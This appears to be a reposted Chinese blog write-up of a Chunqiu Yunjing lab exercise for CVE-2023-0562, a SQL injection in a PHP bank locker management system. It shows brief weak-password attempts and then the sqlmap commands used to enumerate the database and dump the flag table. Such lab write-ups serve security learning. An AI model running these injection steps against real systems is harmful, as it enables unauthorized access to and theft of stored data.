热门标签
热门文章
- 1大模型AI Agent 前沿调研_ai大模型调研
- 2【人工智能概论】 自注意力机制(Self-Attention)
- 3HarmonyOS之常用组件TabList与Tab的功能和使用
- 4Pytorch基础知识(12)GANs生成对抗网络_train_dataloader = dataloader(train_ds, batch_size
- 5解决mysql连接数据太多,“Too many connections“ 解决办法_too many connections to mysql router
- 6Vector、ArraysList和LinkedList有什么区别?_arrays linedlist
- 7Android studio 没有SDK location设置选项_最新版的android studio的sdk location界面没有jdk设置
- 8给玩客云盒子onecloud刷armbian装openwrt当旁路由,刷网心云docker容器魔方版挂机赚钱赚电费_玩客云armbian固件
- 9算法笔记(Java)——动态规划_java动态规划
- 10Qt 程序添加管理员权限的几种方法
当前位置: article > 正文
春秋云境CVE-2023-0562
作者:IT小白 | 2024-03-29 17:28:55
赞
踩
春秋云境CVE-2023-0562
简介
银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。
正文
进入靶场,首先就看到有个bankers,点进去一看发现是个登录界面,那么我就开始尝试弱口令爆破发现没用,然后修改密码,需要邮箱和电话,恰好在主页有邮箱和电话,我尝试输入进去,然后发现这根本就是一个陷阱,没有用。
找到注入点
发现这里有个输入的地方,随便输入进去发现是个查询功能,那么就可能存在sql注入,那就话不多说,抓包上sqlmap
开始抓包
sqlmap开爆
python sqlmap.py -r 2.txt -batch -dbs
python sqlmap.py -r 2.txt -batch -D blmsdb -tables
>python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -columns
拿下靶场
python sqlmap.py -r 2.txt -batch -D blmsdb -T fllllaaaag -C flag -dump
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/336419?site
推荐阅读
相关标签
